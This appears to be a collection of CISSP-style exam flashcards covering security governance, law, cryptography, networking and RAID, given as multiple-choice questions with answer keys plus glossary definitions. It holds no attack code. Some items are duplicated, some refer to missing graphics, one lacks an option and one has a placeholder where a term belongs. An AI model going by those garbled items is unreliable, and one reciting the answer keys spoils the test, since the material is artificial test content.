C. Point-to-Point Protocol (PPP) is a data link protocol that carries out framing and encapsulation for point-to-point connections. Telecommunication devices commonly use PPP as their data link protocol, which encapsulates data to be sent over serial connection links. Layer 2 Tunneling Protocol (L2TP) is used when a PPP connection needs to be extended through a non-IP-based WAN network. L2TP tunnels PPP traffic over various network types such as ATM and Frame Relay. This means that when two networks are connected by WAN links, each network's gateway device (i.e., border router) is configured to use L2TP. When the destination gateway system receives data over the L2TP, it "unwraps" the packets by stripping off the L2TP headers and sends the packets over the next leg of the transmission, which in this graphic is a telecommunication link using PPP.

In a relational database, what field links all the data within a record to a unique value? A. Cell B. Row C. Primary key D. Column key

C. Primary key

Which of the following classification levels are most commonly used in commercial industry? A. Confidential, Secret, Top Secret. B. Unclassified, Sensitive but Unclassified. C. Private, Proprietary, Sensitive. D. Unrestricted, For Government Use Only.

C. Private, Proprietary, Sensitive.

Common Criteria uses which of the following to describe specific security solution needs? A. EPL B. EAP C. Protection profiles D. Security Targets

C. Protection profiles

A party that can prove that damage was caused and that the damage was the company's fault has proved what? A. Due care B. Legally recognized obligation C. Proximate causation D. Due diligence

C. Proximate causation

Which of the following is not a characteristic typically considered important when initially considering security countermeasures? A. Modular in nature. B. Includes an audit function. C. Reasonably priced. D. Defaults to least privilege.

C. Reasonably priced.

RAID systems use a number of techniques to provide redundancy and performance. Which of the following activities divides and writes data over several drives? A. Parity B. Mirroring C. Striping D. Hot-swapping

C. Redundant array of inexpensive disks (RAID) is a technology used for redundancy and/or performance improvement. It combines several physical disks and aggregates them into logical arrays. When data is saved, the information is written across all drives. A RAID appears as a single drive to applications and other devices. When striping is used, data is written across all drives. This activity divides and writes the data over several drives. Both write and read performance are increased dramatically because more than one head is reading or writing data at the same time.

In a redundant array of inexpensive disks (RAID) system, data and parity information are striped over several different disks. What is parity information? A. Information used to create new data B. Information used to erase data C. Information used to rebuild data D. Information used to build data

C. Redundant array of inexpensive disks (RAID) provides fault tolerance for hard drives and the data they hold and can improve system performance. Redundancy and speed are provided by breaking up the data and writing it across several disks so that different disk heads can work simultaneously to retrieve the requested information. Control data is also spread across each disk—this is called parity—so that if one disk fails, the other disks can work together and restore its data. If fault tolerance is one of the services a RAID level provides, parity is involved.

There are many different types of access control mechanisms that are commonly embedded into all operating systems. Which of the following is the mechanism that is missing in this graphic? A. Trusted computing base. B. Security perimeter. C. Reference monitor. D. Domain

C. Reference monitor.

What kind of testing is used to determine if program changes have introduced new errors? A. code comparison B. Integration testing. C. Regression testing. D. Unit Testing.

C. Regression testing.

In a monthly staff meeting, Joe is told to "normalize" the accounting database. What does this mean? A. Update the software so it is consistent with all other databases on the network. B. Add conventional formatting standards. C. Remove redundancies and improper relationships D. Add normal "views" for low ranking accountants.

C. Remove redundancies and improper relationships

Dan is a manager of a company that has a huge enterprise network, which holds data in different containers throughout the environment. Dan needs to provide a centralized storage component that provides redundancy. Which of the following technologies should Dan implement? A. RAID B. MAID C. SAN D. RAIT

C. SAN

What is access control? A. A method of ensuring that a subject (user, program, or process) is the entity it claims to be. B. Requiring the subject to provide a second piece of the credential set, such as a password, passphrase, cryptographic key, or token. C. Security features that control how users and systems communicate and interact with other systems and resources. D. Controlling how an active object accesses a passive subject.

C. Security features that control how users and systems communicate and interact with other systems and resources.

What is the imaginary boundary that separates components that maintain security from components that are not security related? A. Reference monitor. B. Security kernel. C. Security perimeter. D. Security policy.

C. Security perimeter.

Who bears ultimate responsibility for the protection of assets within the organization? A. Data owners B. Cyber insurance providers C. Senior management D. Security professionals

C. Senior management

What are the two main security concerns Robbie is most likely being asked to identify and mitigate? A. Social engineering and spear-phishing B. War dialing and pharming C. Spear-phishing and war dialing D. Pharming and spear-phishing

C. Spear-phishing is a targeted social engineering attack, which is what the CIO's secretary is most likely experiencing. War dialing is a brute-force attack against devices that use phone numbers, as in modems. If the modems can be removed, the risk of war-dialing attacks decreases.

What term is used to describe the construction of a transaction used to systematically test the behavior or performance of a critical service which would normally involve human interaction? A. real user monitoring. B. synthetic transactions C. Gray box testing. D. natural transactions.

C. Synthetic Transactions

Once a year, a full evaluation is conducted to evaluate the effectiveness of existing security within a company. Controls are evaluated and a final report is created. Who handles this kind of activity? A. Data owner. B. Systems expert. C. Systems auditor D. Senior management.

C. Systems auditor

Alice is responsible for ensuring that enterprise data is backed up and recoverable. Which of the following is the most critical duty that Alice must perform? A. Backing up user data files on a daily basis. B. Ensuring that the enterprise databases have replicated. C. Testing recovery procedures with data backups. D. Backing up mailbox data to satisfy e-discovery requirements.

C. Testing recovery procedures with data backups.

A preferred technique of attackers is to become "normal" privileged users of the systems they compromise as soon as possible. This can typically be accomplished in all the following ways except which one? A. Compromising an existing privileged account B. Creating a new privileged account C. Deleting the /etc/passwd file D. Elevating the privileges of an existing account

C. The /etc/passwd file contains user account information on Linux systems. Though it might be possible to download its contents and thus attack the passwords of privileged accounts, deleting the file (even if it were possible) would simply deprive the system of the ability to authenticate users.

What is a common problem with vibration-detection devices used for perimeter security? A. They can be defeated by emitting the right electrical signals in the protected area. B. The power source is easily disabled. C. They cause false alarms. D. They interfere with computing devices.

C. This type of system is sensitive to sounds and vibrations and detects the changes in the noise level of an area it is placed within. This level of sensitivity can cause many false alarms. These devices do not emit any waves; they only listen for sounds within an area and are considered passive devices.

Which legal system is characterized by its reliance on previous interpretations of the law? A. Tort B. Customary C. Common D. Civil (code)

C. The common law system is the only one that is based on previous interpretations of the law. This means that the system consists of both laws and court decisions in specific cases. Torts can be (and usually are) part of a common law system, but that would be an incomplete answer to this question.

Information classification is most closely related to which of the following? A. The source of the information B. The information's destination C. The information's value D. The information's age

C. The information's value

How are a one-time pad and a stream cipher similar? A. They are both asymmetric algorithms. B. They are both vulnerable to linear frequency cryptanalysis attacks. C. They both XOR bits for their encryption process. D. They are both block ciphers.

C. They both XOR bits for their encryption process.

Which of the following is true about data breaches? A. They are exceptionally rare. B. They always involve personally identifiable information (PII). C. They may trigger legal or regulatory requirements. D. The United States has no laws pertaining to data breaches.

C. They may trigger legal or regulatory requirements.

Which of the following are common military categories of data classification? A. Top secret, Secret, Classified, Unclassified. B. Top Secret, Secret, Confidential, Private. C. Top Secret, Secret, Confidential, Unclassified. D. Classified, Unclassified, Public.

C. Top Secret, Secret, Confidential, Unclassified.

Data leak prevention (DLP) does NOT include which of the following activities? A. Enumeration and classification of assets. B. Understanding normal information flows. C. Tracking inbound connections by source. D. Monitoring for specific data in transit.

C. Tracking inbound connections by source.

What is the difference between least privilege and need to know? A. A user should have least privilege that restricts her need to know. B. A user should have a security clearance to access resources, a need to know about those resources, and least privilege to give her full control of all resources. C. A user should have a need to know to access particular resources, and least privilege should be implemented to ensure she only accesses the resources she has a need to know. D. They are two different terms for the same issue.

C. Users should be able to access only the resources they need to fulfill the duties of their positions. They also should only have the level of permissions and rights for those resources that are required to carry out the exact operations they need for their jobs, and no more. This second concept is more granular than the first, but they have a symbiotic relationship.

As head of sales, Jim is the information owner for the sales department. Which of the following is not Jim's responsibility as information owner? A. Assigning information classifications B. Dictating how data should be protected C. Verifying the availability of data D. Determining how long to retain data

C. Verifying the availability of data

COPPA

The Children's Online Privacy Protection Act (1998) requires commercial online content providers (websites) to obtain verifiable parental consent for children under the age of 13 before they can collect, archive, use, or resell any personal information pertaining to that child. Personally identifiable information is anything that would allow someone to identify or contact the child (i.e., full name, address, e-mail address, telephone number, or Social Security number, and, when combined with an identifier, information collected through cookies such as hobbies, interests, or other data concerning the child and/or the parents). It is important for librarians to understand these rules so that they can assist children who are asked for parental consent before engaging in certain online activities and, if necessary, guide them to other sites that do not collect personal information.

In your company's first ever security awareness training class, Ron asked the question "Why do we have to have security awareness training anyway?" What should the trainer's answer be? A. To comply with stockholders' requirements. B. To improve the company's industry reputation. C. To instill fear and work as a deterrent for the individuals who may attempt malicious activities. D. To improve all employee attitudes and behaviors toward security.

D. To improve all employee attitudes and behaviors toward security.

How do you calculate residual risk? A. Threats × risks × asset value B. (Threats × asset value × vulnerability) × risks C. SLE × frequency = ALE D. (Threats × vulnerability × asset value) × control gap

D. (Threats × vulnerability × asset value) × control gap

How do you calculate residual risk? A. Threats × risks × asset value B. (Threats × asset value × vulnerability) × risks C. SLE × frequency = ALE D. (Threats × vulnerability × asset value) × controls gap

D. (Threats × vulnerability × asset value) × controls gap

What is the value of the firewall to the company? A. $62,000 B. $3,000 C. -$62,000 D. -$3,000

D. -$3,000

Rijndael offers multiple key sizes, but they cannot be arbitrary. Which of the following key sizes is not offered with Rijndael? A. 256 B. 128 C. 192 D. 164

D. 164

Many privacy laws dictate which of the following rules? A. Individuals have a right to remove any data they do not want others to know. B. Agencies do not need to ensure that the data is accurate. C. Agencies need to allow all government agencies access to the data. D. Agencies cannot use collected data for a purpose different from what they were collected for.

D. Agencies cannot use collected data for a purpose different from what they were collected for.

Central authenticating systems should perform three primary services. Which service is not one of them? A. Accountability B. Authentication C. Authorization D. Confidentiality.

D. Confidentiality.

Symmetric cryptography has advantages and disadvantages. Which of the following is not considered a disadvantage? A. Key management B. Scalability C. Key distribution D. Confidentiality

D. Confidentiality.

Camellia has just concluded a security audit of some critical services within her environment and the state of the controls deployed to protect them. She has the results of a battery of technical tests and must now organize them into a written report to her chain of management. In analyzing these results, what must her immediate goal be? A. Forwarding these results to upper management in as much technical detail as possible, as quickly as possible, so that upper management can sort out what to do about them B. Crafting a high-level summary of the results for upper management so that they can decide the relative importance of the results to the business mission C. Exploring countermeasures for every one of the negative findings in order to ascertain the least costly approach to fixing all the problems D. Seeking to understand what the results mean, the relative importance of each result, and what, if anything, can and should be done about each

D. Before Camellia can craft a cogent and actionable report for both management and all the other stakeholders involved, she must first seek to make sense of them herself. After all, she is the subject matter expert in this scenario, and the business must rely on her expertise to understand what the results mean and the relative importance of each of her discoveries within the context of the business's technical operations. While it is management's ultimate responsibility to mitigate critical weaknesses, it is up to her to guide their decisions as to how best to do so.

Internet investigations pose a host of challenges for a data forensic expert. Which of the following would not be associated with internet investigation difficulties? A. Lack of skilled investigators. B. Rules of evidence. C. Jurisdiction. D. Biometric complexities.

D. Biometric complexities.

Looking through another person's computer files is an example of what type of attack? A. DoS. B. Hijacking. C. Dictionary. D. Browsing.

D. Browsing.

What is the difference between generating a message authentication code (MAC) and generating a hash MAC (HMAC)? A. There is no difference; they are the same thing. B. They are two different hashing algorithms that are used the same way but produce different message digests (MDs). C. MACs are a result of hashing a message, whereas HMACs are a result of hashing both the message and a public key. D. MACs are a result of hashing a message, whereas HMACs are a result of hashing both the message and a shared secret key.

D. By hashing the message concatenated with a shared secret (symmetric) key, the resulting HMAC can be used to validate not only the integrity of the message, but also that the source possessed the proper key. A MAC can be used to validate the integrity of the message alone.

Which is not true of hierarchical routing? A. The region of nodes that share characteristics and behaviors is called an AS. B. Each AS uses an IGP to perform routing functionality. C. An EGP is used in areas "between" each AS. D. CAs are specific nodes that are responsible for routing to nodes outside their region.

D. CAs are specific nodes that are responsible for routing to nodes outside their region.

Which of the following will risk analysis not yield? A. Monetary values assigned to assets. B. Probability rate of the occurrence of each threat. C. Recommended safeguards, countermeasures, and actions. D. Countermeasures and their costs.

D. Countermeasures and their costs.

Which of the following best describes why Crime Prevention Through Environmental Design (CPTED) would integrate block parties and civic meetings? A. These activities are designed to get people to work together to increase the overall crime and criminal behavior in the area. B. These activities are designed to get corporations to work together to increase the overall awareness of acceptable and unacceptable activities in the area. C. These activities are designed to get people to work together to increase the three strategies of this design model. D. These activities are designed to get people to work together to increase the overall awareness of acceptable and unacceptable activities in the area.

D. CPTED encourages activity support, which is planned activities for the areas to be protected. These activities are designed to get people to work together to increase the overall awareness of acceptable and unacceptable activities in the area. The activities could be neighborhood watch groups, company barbeques, block parties, or civic meetings. This strategy is sometimes the reason for particular placement of basketball courts, soccer fields, or baseball fields in open parks. The increased activity will hopefully keep the bad guys from milling around doing things the community does not welcome.

What is the main drawback of endpoint data leak prevention (EDLP)? A. Inspection. B. Encryption C. Evasion D. Complexity.

D. Complexity.

Which of the following is not considered a secure coding practice? A. Validate user inputs B. Default deny C. Defense in depth D. High (tight) coupling

D. Coupling is not considered a secure coding practice, though it does affect the quality (and hence the security) of software. It is a measurement that indicates how much interaction one module requires to carry out its tasks. High (tight) coupling means a module depends upon many other modules to carry out its tasks. Low coupling is better because the modules are easier to understand and easier to reuse, and changes can take place to one module and not affect many modules around it.

Todd wants to be able to prevent fraud from taking place, but he knows that some people may get around the types of controls he puts into place. In those situations he wants to be able to identify when an employee is doing something suspicious. Which of the following incorrectly describes what Todd is implementing in this scenario and what those specific controls provide? A. Separation of duties by ensuring that a supervisor must approve the cashing of a check over $3,500. This is an administrative control that provides preventive protection for Todd's organization. B. Rotation of duties by ensuring that one employee only stays in one position for up to three months at a time. This is an administrative control that provides detective capabilities. C. Security awareness training, which is a preventive administrative control that can also emphasize enforcement. D. Dual control, which is an administrative detective control that can ensure that two employees must carry out a task simultaneously.

D. Dual control, which is an administrative detective control that can ensure that two employees must carry out a task simultaneously.

Risk assessment is not always met with open arms by management for all of the following reasons except: A. Ignorance. B. Overconfidence. C. Fear. D. Due care and due diligence.

D. Due care and due diligence.

What is the difference between due care and due diligence? A. Due care is the continual effort to ensure that the right thing takes place, and due diligence is the continual effort to stay compliant with regulations. B. Due care is based on the prudent person concept, whereas due diligence is not. C. They mean the same thing. D. Due diligence involves investigating the risks, whereas due care involves carrying out the necessary steps to mitigate these risks.

D. Due care and due diligence are legal terms that do not just pertain to security. Due diligence involves going through the necessary steps to know what a company's or individual's actual risks are, whereas due care involves carrying out responsible actions to reduce those risks. These concepts correspond with the "prudent person" concept.

What is the difference between due care and due diligence? A. Due care is the continual effort of ensuring that the right thing takes place, and due diligence is the continual effort to stay compliant with regulations. B. Due care and due diligence are in contrast to the "prudent man" concept. C. They mean the same thing. D. Due diligence is investigating the risks, and due care is carrying out the necessary steps to mitigate these risks.

D. Due diligence is investigating the risks, and due care is carrying out the necessary steps to mitigate these risks.

Which of the following solutions is best to meet the company's need to protect wireless traffic? A. EAP-TLS B. EAP-PEAP C. LEAP D. EAP-TTLS

D. EAP-Tunneled Transport Layer Security (EAP-TTLS) is an EAP protocol that extends TLS. EAP-TTLS is designed to provide authentication that is as strong as EAP-TLS, but it does not require that each wireless device be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established based upon the server certificates.

Several models and frameworks have been developed by different organizations over the years to help businesses carry out processes in a more efficient and effective manner. Which of the following provides the correct definition mapping of one of these items? i. COSO: A framework and methodology for enterprise security architecture and service management. ii. ITIL: Processes to allow for IT service management, developed by the United Kingdom's Office of Government Commerce. iii. Six Sigma: Business management strategy that can be used to carry out process improvement. iv. See the answer: Organizational development for process improvement, developed by Carnegie Mellon. A. i B. i, iii C. ii, iv D. ii, iii, iv

D. Each of the listed answers in ii, iii, and iv has the correct definition mapping. Answer i is incorrect. COSO is an organization that provides leadership in the areas of organizational governance, internal control, enterprise risk management, fraud, business ethics, and financial reporting. The incorrect description for COSO in answer i maps to SABSA.

There are several different types of important architectures within backup technologies. Which architecture does the graphic that follows represent? A. Clustering B. Grid computing C. Backup tier security D. Hierarchical storage management

D. Hierarchical storage management (HSM) provides continuous online backup functionality. It combines hard disk technology with the cheaper and slower optical or tape jukeboxes. The HSM system dynamically manages the storage and recovery of files, which are copied to storage media devices that vary in speed and cost. The faster media hold the data that is accessed more often, and the seldom-used files are stored on the slower devices, or near-line devices.

High availability (HA) is a combination of technologies and processes that work together to ensure that specific critical functions are always up and running at the necessary level. To provide this level of high availability, a company has to have a long list of technologies and processes that provide redundancy, fault tolerance, and failover capabilities. Which of the following best describes these characteristics? A. Redundancy is the duplication of noncritical components or functions of a system with the intention of decreasing reliability of the system. Fault tolerance is the capability of a technology to discontinue to operate as expected even if something unexpected takes place. If a technology has a failover capability, this means that if there is a failure that cannot be handled through normal means, then processing is "switched over" to a working system. B. Redundancy is the duplication of critical components or functions of a system with the intention of increasing reliability of the system. Fault tolerance is the capability of a technology to discontinue to operate as expected even if something unexpected takes place. If a technology has a failover capability, this means that if there is a failure that cannot be handled through normal means, then processing is "switched over" to a working system. C. Redundancy is the duplication of critical components or functions of a system with the intention of increasing reliability of the system. Fault tolerance is the capability of a technology to continue to operate as expected even if something unexpected takes place. If a technology has a failover capability, this means that if there is a failure that cannot be handled through normal means, then processing is "switched over" to a nonworking system. D. Redundancy is the duplication of critical components or functions of a system with the intention of increasing reliability of the system. Fault tolerance is the capability of a technology to continue to operate as expected even if something unexpected takes place. If a technology has a failover capability, this means that if there is a failure that cannot be handled through normal means, then processing is "switched over" to a working system.

D. High availability (HA) is a combination of technologies and processes that work together to ensure that specific critical functions are always up and running. The specific thing can be a database, a network, an application, a power supply, etc. To provide this level of high availability, the company has to have a long list of technologies and processes that provide redundancy, fault tolerance, and failover capabilities. Redundancy, fault tolerance, and failover capabilities increase the reliability of a system or network. High reliability allows for high availability.

Who is ultimately responsible for making sure data is classified and protected? A. Data owners B. Users C. Administrators D. Management

D. Management.

When can executives be charged with negligence? A. If they follow the transborder laws B. If they do not properly report and prosecute attackers C. If they properly inform users that they may be monitored D. If they do not practice due care when protecting resources

D. If they do not practice due care when protecting resources

John is a new CSO and he has been told that there have been three assaults in the company's parking garage. Which of the following would not be a good countermeasure for John to implement? A. Stair towers and elevators within the garage have glass windows instead of metal walls. B. Pedestrian walkways are created such that people can look out across the rows of cars. C. Different rows for cars to park in are separated by low walls and structural pillars instead of solid walls. D. Implementation of concrete walls between the elevator and the cars.

D. Implementation of concrete walls between the elevator and the cars.

Which of the following are rows and columns within relational databases? A. Rows and tuples B. Attributes and rows C. Keys and views D. Tuples and attributes

D. In a relational database, a row is referred to as a tuple, whereas a column is referred to as an attribute.

Khadijah is leading a software development team for her company. She knows the importance of conducting an attack surface analysis and developing a threat model. During which phase of the software development life cycle should she perform these actions? A. Requirements gathering B. Testing and validation C. Release and maintenance D. Design

D. In the system design phase we gather system requirement specifications and determine how the system will accomplish design goals, such as required functionality, compatibility, fault tolerance, extensibility, security, usability, and maintainability. The attack surface analysis, together with the threat model, informs the developers' decisions because they can look at proposed architectures and competing designs from the perspective of an attacker. This allows them to develop a more defensible system. Though it is possible to start the threat model during the earlier phase of requirements gathering, this modeling effort is normally not done that early. Furthermore, the attack surface cannot be properly studied until there is a proposed architecture to analyze. Performing this activity later in the SDLC is less effective and usually results in security being "bolted-on" instead of "baked-in."

What is the term used to describe the systematic evaluation of the exchange points between a graphical data system and the system's user? A. Black Box Testing B. Administrative Testing. C. Stress Testing. D. Interface Testing.

D. Interface Testing.

Which algorithm was accepted as the Data Encryption Standard (DES)? A. El Gamal B. IDEA C. RC5 D. Lucifer

D. Lucifer.

Which of the following describes the best use of Network Access Control (NAC)? A. The use of IEEE 802.1X Extensible Authentication Protocol (EAP) to authenticate endpoints prior to allowing them to join a network B. The combined use of a public key infrastructure (PKI) and a hardware Trusted Platform Module (TPM) to conduct certificate-based endpoint authentication and establish a secure link through symmetric key exchange C. The combination of EAP for endpoint authentication and multifactor user authentication for highly granular control D. The use of EAP both for endpoint authentication and for inspection of endpoint OS patch levels and antimalware updates, with the goal of placing untrusted systems into a quarantined VLAN segment

D. NAC can and should use some form of EAP for endpoint authentication, but the common best use of it is to enable an authenticated system to be inspected as to its security posture. If the system is behind in its patch level or antimalware updates, or is generally misconfigured, it should be placed into a VLAN that gives it access only to the systems providing the necessary updates and configuration management. Once the system meets policy requirements, it can then be reassigned to the appropriate protected LAN segment.

Why is a truly quantitative risk analysis not possible to achieve? A. It is possible, which is why it is used. B. It assigns severity levels. Thus, it is hard to translate into monetary values. C. It is dealing with purely quantitative elements. D. Quantitative measures must be applied to qualitative elements.

D. Quantitative measures must be applied to qualitative elements.

Which of the following sections of a technical security report is the most critical to include? A. The threats and vulnerabilities. B. The probability of exploitation. C. The impact of exploitation. D. Recommended actions.

D. Recommended actions.

A software development company released a product that committed several errors that were not expected once deployed in their customers' environments. All of the software code went through a long list of tests before being released. The team manager found out that after a small change was made to the code, the program was not tested before it was released. Which of the following tests was most likely not conducted? A. Unit B. Compiled C. Integration D. Regression

D. Regression testing should take place after a change to a system takes place, retesting to ensure functionality, performance, and protection.

A number of measures should be taken to help protect devices and the environment from electric power issues. Which of the following is best to keep voltage steady and power clean? A. Power line monitor B. Surge protector C. Shielded cabling D. Regulator

D. Regulator

When determining what biometric access control system to buy, which factor should be given the least amount of weight? A. User acceptance B. Accuracy of the control C. Processing speed of the control D. Reporting capabilities

D. Reporting capabilities

Which of the following refers to the data left on the media after the media has been erased? A. Semi-hidden B. Dregs C. Sticky bits D. Residual

D. Residual

Jake is an IT administrator who is concerned about the vulnerabilities that exist with instant messaging around the office. He knows that it is very popular throughout the company, especially with upper management, so he must tread lightly when tightening security. Which of the following actions should Jake avoid? A. Install firewalls on desktops. B. Verify the central firewall is blocking unapproved messaging. C. Propose an IM security policy. D. Restrict all confidential data from being sent over IM.

D. Restrict all confidential data from being sent over IM.

Data at rest is commonly: A. Using a RESTful protocol for transmission B. Stored in registers C. Being transmitted across the network D. Stored in external storage devices

D. Stored in external storage devices

Which of the following INCORRECTLY describes IP spoofing and session hijacking? A. Address spoofing helps an attacker to hijack sessions between two users without being noticed. B. IP spoofing makes it harder to track down an attacker. C. Session hijacking can be prevented with mutual authentication. D. IP spoofing is used to hijack SSL and IPSec secure communications.

D. Secure Sockets Layer (SSL) and IPSec can protect the integrity, authenticity, and confidentiality of network traffic. Even if an attacker spoofed an IP address, he would not be able to successfully manipulate or read SSL- or IPSec-encrypted traffic, as he would not have access to the keys and other cryptographic material required.

SSL is a protocol used for securing transactions that occur over untrusted networks. Which of the following best describes what takes place during an SSL connection setup process? A. The server creates a session key and encrypts it with a public key. B. The server creates a session key and encrypts it with a private key. C. The client creates a session key and encrypts it with a private key. D. The client creates a session key and encrypts it with a public key.

D. Secure Sockets Layer (SSL) uses public key encryption and provides data encryption, server authentication, message integrity, and optional client authentication. When a client accesses a website, that website may have both secured and public portions. The secured portion would require the user to be authenticated in some fashion. When the client goes from a public page on the website to a secured page, the web server will start the necessary tasks to invoke SSL and protect this type of communication. The server sends a message back to the client, indicating a secure session should be established, and the client in response sends its security parameters. The server compares those security parameters to its own until it finds a match. This is the handshaking phase. The server authenticates to the client by sending it a digital certificate, and if the client decides to trust the server, the process continues. The client generates a session key and encrypts it with the server's public key. This encrypted key is sent to the web server, and they both use this symmetric key to encrypt the data they send back and forth.

Who does the security auditor report to? A. Data owners B. Data Custodians C. External Audit Organization D. Senior management.

D. Senior management.

The unauthorized disclosure of information defined as secret would by definition result in which of the following levels of damage? A. Grave damage to national security. B. Damage to national security. C. Extreme damage to national security. D. Serious damage to national security.

D. Serious damage to national security.

Alice has inadvertently disclosed classified information regarding a government project that was supposed to remain secret, and only accessible to cleared persons. What level of damage to national security has been risked by her actions? A. Grave B. Irreparable C. Minor D. Serious

D. Serious.

Which of the following would be the best solution to integrate to meet the authentication requirements outlined in the scenario? A. TLS B. IPSec C. 802.1x D. SASL

D. Simple Authentication and Security Layer (SASL) is a protocol-independent authentication framework. It is a framework for authentication and data security in Internet protocols. It decouples authentication mechanisms from application protocols, with the goal of allowing any authentication mechanism supported by SASL to be used in any application protocol that uses SASL. SASL's design is intended to allow new protocols to reuse existing mechanisms without requiring redesign of the mechanisms, and allows existing protocols to make use of new mechanisms without redesign of protocols.

Which of the following does software-defined networking (SDN) technology specify? A. The mapping between MAC addresses and IP addresses in software B. The end nodes' static routing tables in a dynamic way C. How routers communicate their routing tables to each other as events occur D. How routers move packets based on a centrally managed controller's instructions

D. Software-defined networking (SDN) is intended to decouple the router's logical function of making routing decisions and its mechanical function of passing data between interfaces, and to make routing decisions more centrally manageable. The SDN architecture is intended to be a standards-based way of providing control logic to routers' data planes in a scalable, programmable way.

A system has been patched many times and has recently become infected with a dangerous virus. If antimalware software indicates that disinfecting a file may damage it, what is the correct action? A. Disinfect the file and contact the vendor B. Back up the data and disinfect the file C. Replace the file with the file saved the day before D. Restore an uninfected version of the patched file from backup media

D. Some files cannot be properly sanitized by the antivirus software without destroying them or affecting their functionality. So, the administrator must replace such a file with a known uninfected file. Plus, the administrator needs to make sure he has the patched version of the file, or else he could be introducing other problems. Answer C is not the best answer because the administrator may not know the file was clean yesterday, so just restoring yesterday's file may put him right back in the same boat.

The Capability Maturity Model Integration (CMMI) approach is being used more frequently in security program and enterprise development. Which of the following provides an incorrect characteristic of this model? A. It provides a pathway for how incremental improvement can take place. B. It provides structured steps that can be followed so an organization can evolve from one level to the next and constantly improve its processes. C. It was created for process improvement and developed by Carnegie Mellon. D. It was built upon the SABSA model.

D. This model was not built upon the SABSA model. All other characteristics are true.

Which of the following is something that should be required of an offsite backup facility that stores backed-up media for companies? A. The facility should be within 10 to 15 minutes of the original facility to ensure easy access. B. The facility should contain all necessary PCs and servers and should have raised flooring. C. The facility should be protected by an armed guard. D. The facility should protect against unauthorized access and entry.

D. This question addresses a facility that is used to store backed-up data; it is not talking about an offsite facility used for disaster recovery purposes. The facility should not be only 10 to 15 minutes away, because some types of disasters could destroy both the company's main facility and this facility if they are that close together, in which case the company would lose all of its information. The facility should have the same security standards as the company's security, including protection against unauthorized access.

Which of the following transport layer protocols provides flow control? A. User datagram protocol B. Symmetric transmission control protocol C. Real-time transport protocol D. Transmission Control Protocol

D. Transmission Control Protocol

Fred has been told he needs to test a component of the new content management application under development to validate its data structure, logic, and boundary conditions. What type of testing should he carry out? A. Acceptance testing B. Regression testing C. Integration testing D. Unit testing

D. Unit testing involves testing an individual component in a controlled environment to validate data structure, logic, and boundary conditions. After a programmer develops a component, it is tested with several different input values and in many different situations. Unit testing can start early in development and usually continues throughout the development phase. One of the benefits of unit testing is finding problems early in the development cycle, when it is easier and less expensive to make changes to individual units.

Which is not a task for senior management in disaster recovery? A. Approve final plans B. Oversee budget C. Drive all phases of the plan D. Implement the plans themselves

D. Implement the plans themselves

FISMA

Governs the law for federal agencies and government contractors.

Risk Assessment Evaluation and Process

Identifying and documenting single points of failure. Making a prioritized list of threats to the particular business process of the organization. Putting together information for developing a management strategy for risk control and for developing action plans for addressing risks. Documenting acceptance of identified risks, or documenting acknowledgment of risks that will not be addressed.

Availability

Redundant Array of Independent Disks (RAID), clustering, load balancing, redundant data and power lines, software and data backups, disk shadowing, co-location and offsite facilities, rollback functions, failover configurations.

Civil Law

Resolve disputes; remedy is monetary damages.

Export Controls

Restrict the flow of goods and data, for military and scientific purposes.

ECPA (Electronic Communications Privacy Act)

Restricts the interception or monitoring of oral and wire communications unless the interception or monitoring is undertaken for a business purpose or by consent. Employers may monitor employees' emails and communications, with some exemptions.

Computer ethics

Thou shalt not use a computer to harm other people. Thou shalt not interfere with other people's computer work. Thou shalt not snoop around in other people's computer files. Thou shalt not use a computer to steal. Thou shalt not use a computer to bear false witness. Thou shalt not copy or use proprietary software for which you have not paid. Thou shalt not use other people's computer resources without authorization or proper compensation. Thou shalt not appropriate other people's intellectual output. Thou shalt think about the social consequences of the program you are writing or the system you are designing. Thou shalt always use a computer in ways that ensure consideration and respect for your fellow humans.

Zachman Architecture Framework

What, how, where, who, when, and why? Each row should explain the company from that row's perspective (IT, HR, marketing, etc.).

When selecting and implementing information asset protection standards, the process of scoping refers to which of the following? A. Choosing the standard that most closely provides for regulatory compliance within your organization's industry. B. Altering provisions of the chosen standard so that they are more relevant to your organization's environment. D. Making decisions with respect to internal penalties for noncompliance with the chosen standard.

C.

Supply Chain Risk Management

The practice of managing the risk of any factor or event that can materially disrupt a supply chain, whether within a single firm or across multiple firms.

Residual Risk

The risk that remains after management implements internal controls or some other response to risk.

GLBA (Gramm-Leach-Bliley)

1999: Regulates financial institutions. Requires a written information security program. Requires a designated security officer. Limits sharing of financial records.

Six Sigma

A business process for improving quality, reducing costs, and increasing customer satisfaction

Acceptable use policy

Also known as a responsible use policy. Describes how individuals may use information systems. Prohibits illegal activity. Describes what personal use is permitted.

Control frameworks: why adopt

COBIT: business-focused control framework. ISO 27001: part of a series of business standards. NIST 800-53: mandatory for federal agencies.

Redundant components

Components used so that a functioning computer can take over automatically the tasks of a similar component that fails

Hash Functions

Create Message digests from large files

Compliance obligations

Criminal law, civil law, administrative law, private regulations.

Information Security Policy

Designation of individuals responsible for security. Description of security roles and responsibilities. Authority for the creation of security standards. Authority for incident response. Process for policy exceptions and violations.

Criminal Law

Deter and punish acts detrimental to society. Punishable by the deprivation of liberty.

Separation of Duties

Dividing responsibilities between two or more people to limit fraud and promote accuracy of accounting records.

Integrating Security Governance

Ensure governing bodies understand risk and controls. Inform governing bodies of security incidents. Provide audit reports to governing bodies.

18 USC 1029

Fraud and related activity in connection with access devices

18 USC 1030

Fraud and related activity in connection with computers

Risk assessment

Identify assets. Determine the likelihood that a threat exploits a vulnerability. Determine the business impact of these potential threats. Provide an economic balance between the impact of the threat and the cost of the countermeasure.

Military-oriented architecture framework

Makes sure that all of the military's operations can talk to each other; for example, a spy satellite image must be readable by the software that consumes it.

Security Policy Framework

Policies, standards, guidelines, procedures.

GDPR

Processing must be lawful, transparent, and fair. Data must be collected for specific, legitimate purposes. Collect the minimum amount of data. Ensure the accuracy of information. Delete information when no longer needed. Protect the security of personal information.

CFAA (Computer Fraud and Abuse Act)

Prohibits unauthorized access to computer systems. Prohibits the creation of malicious code. Hacking is a criminal offense.

Patents

Protect inventions. Novelty. Usefulness. Non-obviousness. Patents generally last for 20 years. Patents require public disclosure of the invention. Trade secrets offer an alternative to patent protection.

High availability

Protect services against the failure of a single server.

Security Standards

Provide specific details of security controls. Derive their authority from policies. Require compliance from all employees.

Attack Tree

Provides a visual image of the attacks that may occur against an asset.

NIST 800-53

Publication that recommends security controls for federal info systems and organizations except those designed for national security.

Access Controls

